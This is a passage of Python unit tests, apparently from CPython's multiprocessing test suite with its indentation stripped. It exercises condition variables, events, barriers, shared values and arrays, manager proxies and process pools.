args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
